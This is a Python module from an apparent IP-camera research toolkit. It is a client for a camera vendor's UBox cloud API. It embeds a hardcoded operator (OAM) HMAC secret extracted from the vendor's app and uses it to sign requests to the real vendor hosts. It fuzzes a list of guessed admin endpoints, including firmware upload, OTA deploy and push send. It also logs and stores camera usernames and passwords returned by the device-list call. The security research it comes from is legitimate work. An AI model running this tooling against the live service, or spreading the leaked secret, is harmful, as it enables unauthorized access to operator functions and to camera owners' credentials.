Files
cam-mitm/api/ubox_client.py
sssnake 800052acc2 Initial commit — SetecSuite Camera MITM Framework
Original tooling from the Camhak research project (camera teardown of a
rebranded UBIA / Javiscam IP camera). PyQt6 GUI on top of a curses TUI on
top of a service controller; per-service start/stop, intruder detection,
protocol fingerprinting, OAM HMAC signing, CVE verifiers, OTA bucket
probe, firmware fetcher, fuzzer, packet injection.

Tabs: Dashboard, Live Log, Intruders, Cloud API, Fuzzer, Inject, CVEs,
Config, Help. Real-time per-packet protocol detection, conntrack-based
original-destination lookup, log rotation at 1 GiB.

See SECURITY_PAPER.md for the full writeup, site/index.html for the
public report, README.md for usage. Run with:
    sudo /usr/bin/python3 gui.py

Co-authored by Setec Labs.
2026-04-09 08:14:18 -07:00

258 lines
9.5 KiB
Python

"""UBox cloud API client — authenticate, list devices, check firmware, etc."""
import hashlib
import hmac
import base64
import json
import time
import urllib.request
import urllib.error
from utils.log import log, C_SUCCESS, C_ERROR, C_INFO, C_TRAFFIC, C_IMPORTANT
# ─── OAM (operator/admin) endpoint signing ───────────────────────
# Hardcoded secret extracted from com/http/OamHttpClient.java:28
# Base URLs that oam_post() iterates over, in this order, when the caller
# does not pass an explicit base_url.
OAM_BASE_URLS = [
"https://oam.ubianet.com/api",
"https://dev.ubianet.com/oam/api",
]
# Sent as the OAM-APPID header and used as the default appid in oam_sign().
OAM_APPID = "30001"
# Sent as the CLIENT-ID header and used as the default client_id in oam_sign().
OAM_CLIENT_ID = "" # empty in app code; may need to be set per-deployment
# Default HMAC-SHA1 key for oam_sign().
OAM_SECRET = "2894df25f8f740dff5266bc155c662ca"
def oam_sign(body_str, ts_ms, appid=OAM_APPID, client_id=OAM_CLIENT_ID,
             secret=OAM_SECRET):
    """Return the OAM request signature as a lowercase hex string.

    Reproduces com.http.Encryption.Hmac from the app:
        sig_str = "<ts>:<appid>:<clientId>:<body>"
        result  = hex(HmacSHA1(key=secret, msg=sig_str))

    Args:
        body_str: The exact request body text that will be sent.
        ts_ms: Timestamp placed in the signed string (oam_post passes
            milliseconds since the epoch, as a string).
        appid: Application id component of the signed string.
        client_id: Client id component of the signed string.
        secret: HMAC key; encoded as UTF-8 before use.

    Returns:
        The hex-encoded HMAC-SHA1 digest.
    """
    # Colon-joined fields, in the order the app signs them.
    message = ":".join(str(field) for field in (ts_ms, appid, client_id, body_str))
    mac = hmac.new(secret.encode("utf-8"), digestmod=hashlib.sha1)
    mac.update(message.encode("utf-8"))
    return mac.hexdigest()
def oam_post(endpoint, data, base_url=None):
    """POST a JSON body to an OAM endpoint with the OAM signing headers set.

    The body is serialised once, signed with oam_sign(), and then sent to
    each candidate base URL in turn until one returns a parseable JSON
    response.

    Args:
        endpoint: Path appended to the base URL (joined with "/").
        data: JSON-serialisable request payload.
        base_url: If given, only this base is tried; otherwise every entry
            of OAM_BASE_URLS is tried in order.

    Returns:
        The decoded JSON payload of the first successful response.
        If every base fails, a dict describing the last failure:
        {"error": <HTTP status int>, "body": <text>, "base": <base>} for
        HTTP errors, or {"error": <message str>, "base": <base>} for any
        other failure. {"error": "all OAM bases failed"} if no base was tried.

    Raises:
        TypeError / ValueError: if `data` cannot be serialised to JSON.
    """
    body = json.dumps(data).encode("utf-8")
    body_str = body.decode("utf-8")
    ts_ms = str(int(time.time() * 1000))
    sign = oam_sign(body_str, ts_ms)
    headers = {
        "Content-Type": "application/json",
        "OAM-SIGN": sign,
        "OAM-APPID": OAM_APPID,
        "CLIENT-ID": OAM_CLIENT_ID,
        "timestamp": ts_ms,
        "X-UbiaAPI-CallContext": "source=app&app=ubox&ver=1.1.360&osver=14",
    }
    bases = [base_url] if base_url else OAM_BASE_URLS
    last_err = None
    for b in bases:
        url = f"{b}/{endpoint}"
        log(f"OAM: POST {url}", C_INFO)
        # Log the string that was actually signed, including the client id
        # (previously the client-id field was hard-coded as empty here).
        log(f" sign-str = {ts_ms}:{OAM_APPID}:{OAM_CLIENT_ID}:{body_str[:80]}", C_INFO)
        log(f" OAM-SIGN = {sign}", C_INFO)
        try:
            # Request() raises ValueError on a malformed URL; building it
            # inside the try lets a bad base fall through to the next one
            # instead of aborting the whole call.
            req = urllib.request.Request(url, data=body, method="POST", headers=headers)
            with urllib.request.urlopen(req, timeout=15) as resp:
                payload = json.loads(resp.read().decode("utf-8"))
            log(f"OAM: {json.dumps(payload, indent=2)[:400]}", C_TRAFFIC)
            return payload
        except urllib.error.HTTPError as e:
            body_text = e.read().decode("utf-8", errors="replace")[:400]
            log(f"OAM: HTTP {e.code} from {b}: {body_text}", C_ERROR)
            last_err = {"error": e.code, "body": body_text, "base": b}
        except Exception as e:
            # Best-effort probe: record the failure and try the next base.
            log(f"OAM: error from {b}: {e}", C_ERROR)
            last_err = {"error": str(e), "base": b}
    return last_err or {"error": "all OAM bases failed"}
def oam_fuzz(endpoints):
    """Probe candidate OAM endpoints with an empty JSON body.

    Each endpoint is sent through oam_post(). A reply whose "error" is 404
    is counted as missing; any other error is counted as an error and also
    recorded as a hit; a reply with no "error" key is recorded as a hit
    with its code/msg/data fields. Replies that are not dicts are counted
    in "tried" only.

    Args:
        endpoints: Iterable of endpoint paths to probe.

    Returns:
        Dict with keys "hits" (list of per-endpoint dicts), "404s",
        "errors" and "tried" (ints).
    """
    summary = {"hits": [], "404s": 0, "errors": 0, "tried": 0}
    for candidate in endpoints:
        summary["tried"] += 1
        reply = oam_post(candidate, {})
        if not isinstance(reply, dict):
            continue

        failure = reply.get("error")
        if failure == 404:
            summary["404s"] += 1
            continue

        if failure is not None:
            # Non-404 failure: still interesting, so keep it as a hit.
            summary["errors"] += 1
            summary["hits"].append({
                "endpoint": candidate,
                "error": failure,
                "body": reply.get("body", "")[:200],
            })
            continue

        # Real JSON came back (msg=success or msg=fail with code)
        code = reply.get("code")
        msg = reply.get("msg")
        summary["hits"].append({
            "endpoint": candidate,
            "code": code,
            "msg": msg,
            "data": reply.get("data"),
        })
        log(f"OAM-FUZZ: ✓ {candidate} -> code={code} msg={msg}", C_IMPORTANT)

    hit_count = len(summary["hits"])
    log(f"OAM-FUZZ done: {hit_count} hits / {summary['tried']} tried "
        f"({summary['404s']} 404s, {summary['errors']} errors)", C_SUCCESS)
    return summary
# Candidate OAM endpoints — confirmed in source + admin guesses.
# Each entry is a path relative to an OAM base URL.
# NOTE(review): presumably the default input for oam_fuzz(); the call site is
# not visible in this file — confirm.
OAM_ENDPOINT_GUESSES = [
# Confirmed in OamHttpClient.java
"lgc/bind_err",
"app/push_channel_reg",
# Common admin patterns to probe (unverified guesses)
"oam/users", "oam/user/list", "oam/user/info",
"oam/devices", "oam/device/list", "oam/device/info",
"oam/firmware", "oam/firmware/list", "oam/firmware/upload",
"oam/ota", "oam/ota/list", "oam/ota/deploy", "oam/ota/push",
"oam/config", "oam/cloud/config", "oam/cloud/keys",
"oam/stats", "oam/dashboard", "oam/system",
"oam/logs", "oam/audit", "oam/security",
"user/list", "user/info", "user/all",
"device/list", "device/info", "device/all",
"firmware/list", "firmware/all", "firmware/latest",
"ota/list", "ota/all", "ota/deploy",
"admin/users", "admin/devices", "admin/firmware",
"admin/config", "admin/system", "admin/stats",
"stats", "dashboard", "system/info", "system/version",
"lgc/bind_ok", "lgc/list", "lgc/info",
"app/version", "app/config",
"push/list", "push/send", "push/all",
]
def hash_password(password):
    """Return the password hash in the form sent to the login endpoint.

    The password is run through HMAC-SHA1 with an empty key, the raw digest
    is base64-encoded with the URL-safe alphabet ("-" and "_" in place of
    "+" and "/"), and the "=" padding is replaced with ",".

    Args:
        password: Plain-text password (str).

    Returns:
        The encoded digest as a str.
    """
    digest = hmac.new(b"", password.encode("utf-8"), hashlib.sha1).digest()
    encoded = base64.urlsafe_b64encode(digest).decode("utf-8")
    return encoded.replace("=", ",")
def api_post(base_url, endpoint, data, token=None):
    """POST a JSON body to the UBox cloud API and return the decoded reply.

    Args:
        base_url: API base; joined to `endpoint` with "/".
        endpoint: Endpoint path.
        data: JSON-serialisable request payload.
        token: Optional user token, sent as X-Ubia-Auth-UserToken.

    Returns:
        The decoded JSON response on success. On failure, a dict:
        {"error": <HTTP status int>, "body": <first 500 chars>} for HTTP
        errors, or {"error": <message str>} for anything else (network
        failure, malformed URL, non-JSON response).

    Raises:
        TypeError / ValueError: if `data` cannot be serialised to JSON.
    """
    url = f"{base_url}/{endpoint}"
    body = json.dumps(data).encode("utf-8")
    try:
        # Request() raises ValueError for a URL without a scheme (e.g. an
        # empty or mistyped api_base); keep it inside the try so callers get
        # the same error-dict shape as for every other failure.
        req = urllib.request.Request(url, data=body, method="POST")
        req.add_header("Content-Type", "application/json")
        req.add_header("X-UbiaAPI-CallContext", "source=app&app=ubox&ver=1.1.360&osver=14")
        if token:
            req.add_header("X-Ubia-Auth-UserToken", token)
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.loads(resp.read().decode("utf-8"))
    except urllib.error.HTTPError as e:
        return {"error": e.code, "body": e.read().decode("utf-8", errors="replace")[:500]}
    except Exception as e:
        # Callers branch on the returned dict rather than on exceptions.
        return {"error": str(e)}
def login(cfg):
    """Log in to the cloud API and store the returned token in cfg.

    Requires cfg["api_email"] and cfg["api_password"] to be set. On a
    "success" reply the token is written to cfg["api_token"] and cfg.save()
    is called.

    Args:
        cfg: Config object supporting item access and save().

    Returns:
        True if the login succeeded, False otherwise.
    """
    if not (cfg["api_email"] and cfg["api_password"]):
        log("API: set api_email and api_password first", C_ERROR)
        return False

    payload = {
        "account": cfg["api_email"],
        "password": hash_password(cfg["api_password"]),
        "app": "ubox",
        "app_version": "1.1.360",
        "device_type": 1,
        "lang": "en",
        "brand": "Python",
        "device_token": "none",
        "regid_jg": "fail",
        "regid_xm": "fail",
        "regid_vivo": "fail",
    }
    log(f"API: logging in as {cfg['api_email']}...", C_INFO)
    result = api_post(cfg["api_base"], "v3/login", payload)

    if not result or result.get("msg") != "success":
        log(f"API: login failed: {json.dumps(result)[:200]}", C_ERROR)
        return False

    session = result["data"]
    cfg["api_token"] = session["Token"]
    log(f"API: login OK — token={cfg['api_token'][:20]}...", C_SUCCESS)
    # The reply may carry an app_config section; only its presence is logged.
    if session.get("app_config", {}):
        log("API: leaked app_config keys extracted", C_IMPORTANT)
    cfg.save()
    return True
def devices(cfg):
    """Fetch the account's device list and log each device.

    For a device whose entry includes both cam_user and cam_pwd, the
    credentials are logged and its uid/user/password are written to cfg
    (later devices overwrite earlier ones). cfg.save() is called once the
    list has been processed.

    Args:
        cfg: Config object supporting item access and save().

    Returns:
        The list of device dicts from the reply, or [] when not logged in
        or when the request did not succeed.
    """
    if not cfg["api_token"]:
        log("API: login first", C_ERROR)
        return []

    result = api_post(cfg["api_base"], "user/device_list", {}, cfg["api_token"])
    if not (result and result.get("msg") == "success"):
        log(f"API: {json.dumps(result)[:300]}", C_ERROR)
        return []

    data = result["data"]
    devs = data.get("list", [])
    fw = data.get("firmware_ver", [])
    log(f"API: {len(devs)} device(s), firmware: {fw}", C_SUCCESS)

    for entry in devs:
        uid = entry.get("device_uid", "?")
        name = entry.get("name", "?")
        cam_user = entry.get("cam_user", "")
        cam_pwd = entry.get("cam_pwd", "")
        model = entry.get("model_num", "?")
        battery = entry.get("battery", "?")
        log(f" [{uid}] {name} model={model} bat={battery}%", C_TRAFFIC)
        if not (cam_user and cam_pwd):
            continue
        # NOTE(review): nesting of the cfg writes was reconstructed from a
        # flattened listing — confirm they belong under the creds check.
        log(f" LEAKED CREDS: {cam_user} / {cam_pwd}", C_IMPORTANT)
        cfg["device_uid"] = uid
        cfg["device_cam_user"] = cam_user
        cfg["device_cam_pwd"] = cam_pwd

    cfg.save()
    return devs
def check_firmware(cfg):
    """Query the firmware version-check endpoint for the configured device.

    Sends host/wifi versions of "0.0.0.1" together with cfg["device_uid"].

    Args:
        cfg: Config object supporting item access.

    Returns:
        The api_post() result, or None when cfg has no token or device uid.
    """
    if not (cfg["api_token"] and cfg["device_uid"]):
        log("API: login and get devices first", C_ERROR)
        return None

    query = {
        "device_uid": cfg["device_uid"],
        "host_version": "0.0.0.1",
        "wifi_version": "0.0.0.1",
        "is_lite": False,
        "zone_id": 2,
    }
    result = api_post(
        cfg["api_base"],
        "user/qry/device/check_version/v3",
        query,
        cfg["api_token"],
    )
    log(f"API firmware: {json.dumps(result, indent=2)}", C_TRAFFIC)
    return result
def device_services(cfg):
    """Query the device_services endpoint for the configured device.

    Args:
        cfg: Config object supporting item access.

    Returns:
        The api_post() result, or None when cfg has no token or device uid.
    """
    if not (cfg["api_token"] and cfg["device_uid"]):
        log("API: login and get devices first", C_ERROR)
        return None

    query = {"device_uid": cfg["device_uid"]}
    result = api_post(
        cfg["api_base"],
        "user/qry/device/device_services",
        query,
        cfg["api_token"],
    )
    # Only the first 600 characters of the pretty-printed reply are logged.
    log(f"API services: {json.dumps(result, indent=2)[:600]}", C_TRAFFIC)
    return result
def raw_request(cfg, endpoint, data=None):
    """POST an arbitrary authenticated request and log the reply.

    Args:
        cfg: Config object supporting item access.
        endpoint: Endpoint path relative to cfg["api_base"].
        data: Request payload; an empty dict is sent when falsy.

    Returns:
        The api_post() result, or None when cfg has no token.
    """
    if not cfg["api_token"]:
        log("API: login first", C_ERROR)
        return None

    log(f"API: POST {endpoint}", C_INFO)
    payload = data if data else {}
    result = api_post(cfg["api_base"], endpoint, payload, cfg["api_token"])
    # Only the first 800 characters of the pretty-printed reply are logged.
    log(f"API: {json.dumps(result, indent=2)[:800]}", C_TRAFFIC)
    return result
def families(cfg):
    """POST an empty body to user/families via raw_request() and return its result."""
    endpoint = "user/families"
    return raw_request(cfg, endpoint)
def device_list_v2(cfg):
    """POST an empty body to v2/user/device_list via raw_request() and return its result."""
    endpoint = "v2/user/device_list"
    return raw_request(cfg, endpoint)